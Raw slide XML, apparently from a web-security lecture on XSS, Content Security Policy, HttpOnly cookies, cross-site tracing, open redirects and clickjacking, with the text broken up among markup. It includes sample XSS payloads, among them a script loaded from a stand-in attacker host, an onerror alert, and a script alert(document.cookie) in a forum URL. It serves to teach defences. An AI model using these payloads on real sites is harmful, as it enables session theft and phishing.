            <a:off x="547488" y="23830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template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80FE88-4B62-4D15-958C-44198343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83" y="1690688"/>
            <a:ext cx="5954078" cy="457107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1F1BB-67AE-4C21-BF70-417619960348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6383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https://golang.org/pkg/html/template/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2826770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89D6D-7140-41F2-9411-F3B7AD01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Security Policy (CSP)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15DC11-1567-4C09-A8AA-3CA5BBAC0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340" cy="485711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endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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origin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='messageparser.js'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>neither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='http://darkside.me/payload.js'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Nor inline code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>="x" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>="alert(1)"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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de-DE" dirty="0"/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' *.trustedpartner.com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activate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>reporting</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Reporting-Endpoints: endp-1="https://lightside.me/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cspreport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>default-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>‘; report-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endp-1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25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F6EC3-8D33-457B-9D19-B33A0C69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Security Policy (CSP)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0017C-65A0-44F9-AC81-9872FD20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specify one specific script as a trusted script loader instead of defining an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allowlist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script is identified by a random (changing) nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script-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 'nonce-r@nd0m' 'strict-dynamic';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ault-src 'self’;</a:t>
            </a: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914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>="/script-loader.js" nonce="r@nd0m"&gt;&lt;/script&gt;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C90AF7-4C08-4DCF-B108-0D2503F28380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872740" y="6308209"/>
            <a:ext cx="832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https://content-security-policy.com/strict-dynamic/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98674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C0A08-242C-4D9C-AD22-02DD4737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Flag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EA4607-FE9F-487B-A05E-5E3CDEAA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53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AT" dirty="0"/>
              <a:t>Set Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>“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prevent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access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>especially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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>!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Defense in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>: also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>disable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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „TRACE“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>theory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>, an </a:t>
            </a:r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could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> send a TRACE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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> via XSS (XST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Cookie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appended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request</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>response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contain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>would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able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read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>cookie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response</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> block TRACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>currently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exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>vector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73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901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3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5933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Scripting (XSS)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malicious JavaScript code in the user‘s browser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injecting the code via the application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Output Encoding (frameworks)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HTTPOnly</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> Flag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A7:2017-Cross-Site Scripting (XSS)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C735EA8-4C70-48F2-85E9-C6AC783C6630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5129050" y="2048431"/>
          <a:ext cx="5213129" cy="12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364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1975945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288284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Variations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Serverside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Clientside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Flaw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Non-Persistent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Reflected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200" dirty="0" err="1"/>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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63339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/>
                        <a:t>Persistent</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1200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Server XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="12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 err="1"/>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                        <a:t> Client XSS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40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AAF8DC-FDF0-4026-AFB7-25D41B85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Nice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F4854F-9E3F-4A5F-A200-E2199280D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AT" dirty="0"/>
              <a:t>Samy / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>JS.Spacehero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MySpace Worm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2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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Fastest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>spreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>worm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de-AT" dirty="0" err="1"/>
              <a:t>times</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>&gt; 1.000.000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within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>hours</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>actions</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Posted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"but most of all, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is my hero" on the victims profile page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as friend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9381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24873D-BEED-4BA4-AE73-4AA7215A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75" y="2121119"/>
            <a:ext cx="7592786" cy="187281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859CAE7-9E0F-4E64-B450-382C84E6314D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144921" y="453265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3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D0519423-E8F5-48FA-B003-DAD6B695BD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426028" y="2632915"/>
            <a:ext cx="9339943" cy="2432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394434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7A30B8-51AF-4074-8842-DD2D30FB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5" y="387240"/>
            <a:ext cx="5154791" cy="346201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B81917C-24D5-4B75-9852-B912CB8E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36" y="387240"/>
            <a:ext cx="4772025" cy="157162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B7B134D-035E-44D9-9AFF-414F01937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2012"/>
            <a:ext cx="12192000" cy="8821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5FEFBB3-5236-4AD1-8471-3F8CCD68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18" y="2755988"/>
            <a:ext cx="5695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66217A-C3E2-44CB-8622-08459457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142" y="3564667"/>
            <a:ext cx="6568802" cy="27742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29D77C-4398-49BB-8434-A06845582E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600218" y="2476438"/>
            <a:ext cx="1113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dirty="0"/>
              <a:t>%68%74%74%70%3a%2f%2f%64%61%72%6b%73%69%64%65%2e%6d%65%2f%70%61%79%6c%6f%61%64%2e%68%74%6d%6c</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0"/>
              <a:t>http://darkside.me/payload.html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22A58B-5671-4431-AE65-F5520B3B7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0800"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1261367"/>
            <a:ext cx="12192000" cy="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38797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4952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30854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1088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418843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623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9844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43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666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6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771891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623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293440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="6126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125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Unverified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="3200" b="1" i="0" u="none" dirty="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>/Open Redirects/Forwards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to a malicious site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very good way for phishing attacks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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>userinput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> is used in redirection/forward links, those links can be manipulated    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validate redirection/forward URLs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by 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 if possible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Was </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>kicked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Top 10 2017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Define an approach that ensures all data are explicitly validated.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8D313-C60B-4143-8B57-C5D10D2B4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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883947" y="3139972"/>
            <a:ext cx="3674745" cy="57805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3F49674-7759-4D2E-B296-D829C1E4C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7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883947" y="3806112"/>
            <a:ext cx="5201883" cy="10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5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3434742" y="1765162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/forum/foverview.php?uname=Luke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5414312-107F-4C04-A0A1-EF920D8FE92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28562" y="3987241"/>
            <a:ext cx="5983812" cy="1257422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9B82132-08BE-4E9B-9C4E-BA5DC11AFC8B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7032657-719E-4411-8349-89AA04CA906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6D6A1EA0-8891-4987-A7D7-D5FDCC330DD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45448955-E264-429B-9F2C-3E358734697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38FF78AB-8CDB-4238-A915-44C4A622A9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C9AA9E1B-2F80-4541-ACFE-B2AC1BF3908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6EAA80DC-747F-4595-9D68-BDD45FCCE80B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EE59968-5BC7-475F-A149-0C109B02C192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958AADC3-FC03-4974-B11C-A3743A5C214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E5EC457-86EB-4C0A-A1E0-A9E96E9A5FED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7196FE07-B212-4DE2-A9CF-FA5A93C55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15ED04B1-5E56-4318-B055-4E34CC5649B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0BE29B4B-074B-43A0-BC46-6730408EC12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0463C0EC-8320-48DD-9B99-44CBD5F5300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9AF6E1F-1B24-4EB3-8C6E-795E14C701E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5825CB-212D-4123-B6A4-2DDBD288A904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B835F08-091D-479B-907B-9854036CC940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A2A71227-C6DD-4EBF-B504-96F5BA66F6FD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E9A7DE9D-33E8-4C4A-A36B-041D4D638AFC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B879847-713C-4212-A128-DAB7E070710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3DEF27E8-0F60-4ABD-B7A8-7FC75CCC9AD2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FA3EB37A-1F5C-4A4B-9891-2C67B7ABDCE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741AE8EE-B3E1-4108-AF79-1EF5BC4B844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87ABBCF6-1EB4-4CE8-9EF1-7D0B4CB95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77D985C1-EAFD-4B62-B1E0-9FA57A7E6232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201504FF-E75E-477A-8F5F-3A1BB05A415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D1F21173-1922-4878-9D71-D9851743236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B50C78A8-F6DF-47F8-BBDB-F01116F27CF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190C4CC4-3317-4ACE-8A7A-6CB015167F4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1A954F8-A172-4BA7-B5DA-4DF23A898417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A53A078E-2CF4-4F9D-927B-58074C28F738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F8968EA-5BA2-4C39-B06B-41EB84BBB60A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AAC073E5-F19B-4F3E-B6C3-FB984FF60F82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1AB8CEC2-83AD-4AE4-B495-DE287268FA46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76CF6A07-BEEB-4A2A-ACD0-5AE1DC78F597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E3DD5E38-A512-4466-BD76-91A4CE5D3605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A61B0323-E438-4FE7-B897-7F168DD499A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97078374-161D-4B38-B6F7-FF5E7B2BBC0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A95A1219-FC1D-4C81-AD4F-CA50FE7FB9D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C46F5B54-5717-433A-85AD-B5BB44BC15F9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394B6F60-90BE-4099-9A59-404EF955F54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3A502A75-9F7C-47AA-8B11-FE785B529E2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89ED30A2-B10E-4AE3-A5BE-D9E6D93A030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31EA90E1-9733-47DC-866C-3B3E8540218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D22A17D2-E3F2-49A2-BE73-A173988CF714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6EE27F01-DFC3-49DB-BA42-DD4DC22D6296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F6099D9-121B-4D94-A584-8F3C7B3757F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BD1AD322-EAD7-46BB-B425-8C372719EC2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441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514F424-367F-484C-99EE-A10433F1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84847"/>
            <a:ext cx="5697072" cy="25384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D646922-3257-494B-863A-AE9FD5C8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3508057"/>
            <a:ext cx="5697072" cy="2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9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11B61FC-BD17-4CD2-B868-F49192E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248603"/>
            <a:ext cx="9553576" cy="348043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D22156-64F0-4AD6-9F66-925F1CB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8" y="3876673"/>
            <a:ext cx="6504623" cy="2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27940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7008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13061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652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2533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447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7157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5983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699154"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="6358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73702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Clickjacking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2040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Lure victim into clicking things he actually doesn’t want to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0936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including the form as a transparent overlay-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 the user thinks he clicks at the visible underlay, but actually clicks the invisible overlay.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39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X-Frame-Options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deny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X-Frame-Options: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>sameorigin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X-Frame-Options: allow-from https://my-trusted-partner.com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CSP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 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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT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de-AT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Content-Security-Policy: frame-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-A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ancestors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my-trusted-partner.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de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064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0767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Earn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or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give</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0"/>
                        <a:t>, but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assume</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
                        <a:t>trust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004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0DB78-AB5E-4845-BDA8-57563707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CE49D1-00A0-443D-BE62-56F93D3B9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just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 and backend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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>sanitize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43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45F8F8D-8DFF-4050-AF52-E9CBED4A550A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96B41F55-2AB6-40C9-A539-550326BEF34D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251C3927-0E6E-46AC-AB35-111F8DD3CD70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00E6EB91-CEEC-42B0-99E0-8256A7512B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647982" y="1827852"/>
            <a:ext cx="1018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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/forum/foverview.php?uname=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&lt;script&gt;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alert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(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document.cookie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)&lt;/script&gt;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A3263631-C31C-44D6-AC72-F858E18EC3A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70955" y="3886980"/>
            <a:ext cx="4253553" cy="2592591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9A69FD5-C9BA-478D-99A3-681992EBA07A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="656095" y="42485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C9BAA366-AF6D-4946-94B4-B2A80239E879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C5CAD1F-F130-4C57-81A1-54E2BF95B30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20603052-767B-4A8E-9378-C34AED14647D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2B18454C-65D3-4F9F-B69F-01004FD597A5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7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838615" y="547149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E303561-2809-4018-A4A1-8D43E7846174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6C01D7EE-F64A-4F37-A7AC-CDE68D757D3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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23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18AF9096-0301-4CB1-A9E8-0681BDB75A25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D4C573B5-D355-4888-93FD-13CE773DD37C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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458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25046F34-AB03-407D-ACFE-A9BE9B0D4D6F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0246770D-FC90-415E-ADD4-01821FE77D45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B32F8C8-B476-446C-ADAA-493F8C479FD9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F38376E0-E5E5-45AE-8420-F43EE8E8477A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E77F98BA-76C7-493D-891B-349FD0EBEB82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E085404-5C04-4A2B-B64D-B9DC7338E39C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C501CF93-3C6F-40A4-A21F-34699DE39470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95E0EF96-9BDD-4544-81DD-13856536C6A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9B67ADB9-E23E-4217-8C13-25877BE929C4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B78F58A-35BA-452B-8770-898424EB8F7F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3BD93E4-B1DE-496E-B95B-77FE8B116ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1047564" y="178586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B706FB-312B-4961-A45B-1942D70991B5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0BEAB219-1E9D-4A70-9339-1033ED06EC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94060BFE-07A1-45B9-BAE4-50910DED95C2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F8F484B0-95F3-4B6B-930E-E9ACBF616F8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25D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
